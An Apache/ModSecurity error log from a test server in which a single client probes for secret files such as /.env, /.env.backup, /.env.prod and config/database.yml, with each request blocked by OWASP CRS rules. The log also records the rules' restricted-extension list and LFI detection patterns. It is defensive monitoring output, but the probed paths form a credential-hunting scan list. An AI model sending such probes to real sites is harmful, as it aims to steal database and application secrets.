[Thu Jan 01 09:26:30.297313 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/db/database.yml"] [unique_id "aVYvtiEFf7TT1LdjoKPG-AAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:30.297504 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/db/database.yml"] [unique_id "aVYvtiEFf7TT1LdjoKPG-AAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:30.380086 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "database.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: database.yml found within REQUEST_FILENAME: /config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/database.yml"] [unique_id "aVYvtiEFf7TT1LdjoKPG-QAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:30.380326 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/database.yml"] [unique_id "aVYvtiEFf7TT1LdjoKPG-QAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:30.380487 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/database.yml"] [unique_id "aVYvtiEFf7TT1LdjoKPG-QAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:30.546749 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVYvtiEFf7TT1LdjoKPG-wAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:30.546987 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVYvtiEFf7TT1LdjoKPG-wAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:30.547173 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVYvtiEFf7TT1LdjoKPG-wAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:30.881088 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aVYvtiEFf7TT1LdjoKPG_wAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:30.881264 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aVYvtiEFf7TT1LdjoKPG_wAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:30.881479 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aVYvtiEFf7TT1LdjoKPG_wAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:30.881636 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aVYvtiEFf7TT1LdjoKPG_wAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:30.963907 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aVYvtiEFf7TT1LdjoKPHAAAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:30.964160 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aVYvtiEFf7TT1LdjoKPHAAAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:30.964314 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aVYvtiEFf7TT1LdjoKPHAAAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:31.046398 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aVYvtyEFf7TT1LdjoKPHAQAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:31.046574 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aVYvtyEFf7TT1LdjoKPHAQAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:31.046797 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aVYvtyEFf7TT1LdjoKPHAQAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:31.046952 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aVYvtyEFf7TT1LdjoKPHAQAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:31.129407 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aVYvtyEFf7TT1LdjoKPHAgAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:31.129674 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aVYvtyEFf7TT1LdjoKPHAgAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:31.129835 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aVYvtyEFf7TT1LdjoKPHAgAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:31.212467 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aVYvtyEFf7TT1LdjoKPHAwAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:31.212733 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aVYvtyEFf7TT1LdjoKPHAwAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:31.212913 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aVYvtyEFf7TT1LdjoKPHAwAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:31.294918 2026] [authz_core:error] [pid 1117460] [client 54.75.202.236:53982] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/.env, referer: https://www.google.com/
[Thu Jan 01 09:26:31.377302 2026] [authz_core:error] [pid 1117460] [client 54.75.202.236:53982] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/.env, referer: https://www.google.com/
[Thu Jan 01 09:26:31.460092 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aVYvtyEFf7TT1LdjoKPHBgAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:31.460327 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aVYvtyEFf7TT1LdjoKPHBgAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:31.460485 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aVYvtyEFf7TT1LdjoKPHBgAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:31.542880 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aVYvtyEFf7TT1LdjoKPHBwAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:31.543117 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aVYvtyEFf7TT1LdjoKPHBwAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:31.543280 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aVYvtyEFf7TT1LdjoKPHBwAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:31.625672 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aVYvtyEFf7TT1LdjoKPHCAAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:31.625897 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aVYvtyEFf7TT1LdjoKPHCAAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:31.626055 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aVYvtyEFf7TT1LdjoKPHCAAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:31.708359 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aVYvtyEFf7TT1LdjoKPHCQAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:31.708587 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aVYvtyEFf7TT1LdjoKPHCQAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:31.708767 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aVYvtyEFf7TT1LdjoKPHCQAAAAc"], referer: https://www.google.com/
